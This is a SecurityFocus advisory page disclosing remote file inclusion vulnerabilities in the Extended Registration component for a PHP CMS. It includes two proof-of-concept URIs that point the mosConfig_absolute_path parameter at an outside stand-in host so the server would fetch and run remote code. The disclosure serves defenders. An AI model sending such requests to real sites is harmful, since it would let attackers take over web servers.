Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Extended Registration Component mosConfig_absolute_path Multiple Remote File Include Vulnerabilities

Attackers can exploit this issue using a web client.

The following proof-of-concept URI is available:

http://www.example.com/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.example2.com?
http://www.example.com/administrator/components/com_extended_registration/admin.extended_registration.php?mosConfig_absolute_path=http://www.example2.com







 

Privacy Statement
Copyright 2009, SecurityFocus